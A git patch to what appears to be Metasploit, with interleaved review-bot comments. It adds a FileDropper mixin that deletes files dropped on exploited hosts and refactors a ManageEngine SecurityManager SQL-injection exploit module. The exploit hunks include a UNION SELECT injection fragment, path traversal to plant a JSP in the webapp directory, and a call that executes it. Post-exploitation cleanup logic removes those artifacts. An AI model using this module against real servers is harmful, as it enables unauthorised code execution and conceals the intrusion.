From 83708a5a48b08bb47d49e8bcfca715cd1c9e9885 Mon Sep 17 00:00:00 2001
From: James Lee
Date: Thu, 15 Nov 2012 17:52:10 -0600
Subject: [PATCH] Add a FileDropper mixin for recording cleanup targets
Doesn't cover shell sessions yet, so needs a bit more work
---
 lib/msf/core/exploit/file_dropper.rb | 72 +++++++++++++++++++
 .../multi/http/manageengine_search_sqli.rb | 28 +++++---
 2 files changed, 92 insertions(+), 8 deletions(-)
 create mode 100644 lib/msf/core/exploit/file_dropper.rb
diff --git a/lib/msf/core/exploit/file_dropper.rb b/lib/msf/core/exploit/file_dropper.rb
new file mode 100644
index 0000000000..eed1bb3e58
--- /dev/null
+++ b/lib/msf/core/exploit/file_dropper.rb
@@ -0,0 +1,72 @@
+# -*- coding: binary -*-
+
+module Msf
+module Exploit::FileDropper
+
+ #
+ # When a new session is created, attempt to delete any files that the
+ # exploit created.
+ #
+ # @param (see Msf::Exploit#on_new_session)
+ # @return [void]
+ #
+ def on_new_session(session)
+ if session.type == "meterpreter"
+ session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
+ end
+
+ @dropped_files.delete_if do |file|
+ if session.type == "meterpreter"
+ begin
+ session.fs.file.rm(file)
+ print_good("Deleted #{file}")
+ true
+ rescue ::Rex::Post::Meterpreter::RequestError
+ false
+ end
+ else
+ # Need to be platform-independent here. Not sure of the best way
+ # to do that since we can't be certain that {#target} is
+ # accurate; exploits with automatic targets frequently change
+ # it.
+ false
+ end
+ end
+
+ super
+ end
+
+ #
+ # Record file as needing to be cleaned up
+ #
+ # @param files [Array] List of paths on the target that should
+ # be deleted during cleanup. Each filename should be either a full
+ # path or relative to the current working directory of the session
+ # (not necessarily the same as the cwd of the server we're
+ # exploiting).
+ # @return [void]
+ def register_files_for_cleanup(*files)
+ @dropped_files ||= []
+ @dropped_files += files
+
+ nil
+ end
+
+ # Singular version
+ alias register_file_for_cleanup register_files_for_cleanup
+
+ #
+ # Warn the user if any files (registered with {#register_dropped_file}) were
+ # not cleaned up
+ #
+ # @see Msf::Exploit#cleanup
+ def cleanup
+ super
+ if @dropped_files and @dropped_files.any?
+ @dropped_files.each do |f|
+ print_warning("This exploit may require manual cleanup of: #{f}")
+ end
+ end
+ end
+end
+end
diff --git a/modules/exploits/multi/http/manageengine_search_sqli.rb b/modules/exploits/multi/http/manageengine_search_sqli.rb
index 8b27eb6f73..c02b4c88e9 100644
--- a/modules/exploits/multi/http/manageengine_search_sqli.rb
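Review bot: `@dropped_files.delete_if do |file|` in `on_new_session` runs with no nil guard, so a module that includes the mixin but never reached `register_files_for_cleanup` before a session arrives raises NoMethodError inside the session callback and never gets to `super`; `cleanup` further down guards the same variable, so the two are inconsistent. Initialising on the line before it, `@dropped_files ||= []`, keeps the callback safe for that case. The `cleanup` doc comment points at `{#register_dropped_file}`, which is not defined in this file; it should read `{#register_files_for_cleanup}`. Style: `if @dropped_files and @dropped_files.any?` uses `and` for a boolean condition, where `if @dropped_files && @dropped_files.any?` is the conventional form.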
+++ b/modules/exploits/multi/http/manageengine_search_sqli.rb @@ -6,11 +6,13 @@ ## require 'msf/core' +require 'msf/core/exploit/file_dropper' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper include Msf::Exploit::EXE def initialize(info={}) @@ -68,9 +70,10 @@ class Metasploit3 < Msf::Exploit::Remote rnd_num = Rex::Text.rand_text_numeric(1) rnd_fname = Rex::Text.rand_text_alpha(5) + ".txt" - outpath = "../../webapps/SecurityManager/#{rnd_fname}" + clean_path= "../webapps/SecurityManager/#{rnd_fname}" + outpath = "../" + clean_path - @clean_ups << outpath + register_file_for_cleanup(clean_path) sqli = "#{rnd_num})) union select @@version," sqli << (2..28).map {|e| e} * "," @@ -95,6 +98,10 @@ class Metasploit3 < Msf::Exploit::Remote end +=begin +Now covered by FileDropper mixin. Keep it here, commented out, for now +since FileDropper doesn't cover shell sessions yet. + # # We're in SecurityManager/bin at this point # @@ -127,6 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote end } end +=end # @@ -229,6 +237,7 @@ class Metasploit3 < Msf::Exploit::Remote 'COUNT' => '1' } }) + end # @@ -253,9 +262,6 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - # This is used to collect files we want to delete later - @clean_ups = [] - @my_target = pick_target if @my_target.nil? print_error("#{rhost}:#{rport} - Unable to select a target, we must bail.") 
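Review bot: `clean_path= "../webapps/SecurityManager/#{rnd_fname}"` in the -68 hunk drops the space before `=`; `clean_path = "../webapps/SecurityManager/#{rnd_fname}"` matches the neighbouring assignments, and the same slip appears in the -263 hunk. This hunk also introduces the two differently-rooted paths without saying why `clean_path` has one `../` fewer than `outpath`, whereas the -263 hunk explains it; a one-line pointer above the assignment, `# clean_path is relative to the session cwd, outpath to the server's cwd -- see the comment in exploit()`, would keep the two drop sites in step. That the same cwd relationship holds for this `.txt` drop is inferred from the -263 comment rather than shown here. The method enclosing the -68 hunk starts outside it.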
@@ -263,10 +269,16 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 jsp_name = rand_text_alpha(rand(6)+3)
- outpath = "../../webapps/SecurityManager/#{jsp_name + '.jsp'}"
+ # The working directory when our payload runs is
+ # c:/AdventNet/SecurityManager/bin/
+ # while the jsp file will be in
+ # c:/AdventNet/SecurityManager/webapps/SecurityManager/
+ # so we need to adjust the traversal level.
+ clean_path= "../webapps/SecurityManager/#{jsp_name + '.jsp'}"
+ outpath = "../" + clean_path
- @clean_ups << outpath
+ register_file_for_cleanup(clean_path)
 inject_exec(outpath)
 end
-end
\ No newline at end of file
+end
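Review bot: The new comment gives the working directory as `c:/AdventNet/SecurityManager/bin/`, but the module lives under `exploits/multi/http` and the FileDropper docs make a relative `clean_path` depend on the session's cwd, so a reader may take the traversal as a Windows-only assumption. If the `bin/` to `webapps/SecurityManager/` layout is the same on every supported install, a clause such as `# (Windows install shown; the relative layout is the same elsewhere)` records that; if it is not, the comment should say which platforms the cleanup path covers. Whether the layout is platform-independent is not visible from this hunk. The `exploit` method this belongs to starts outside the hunk.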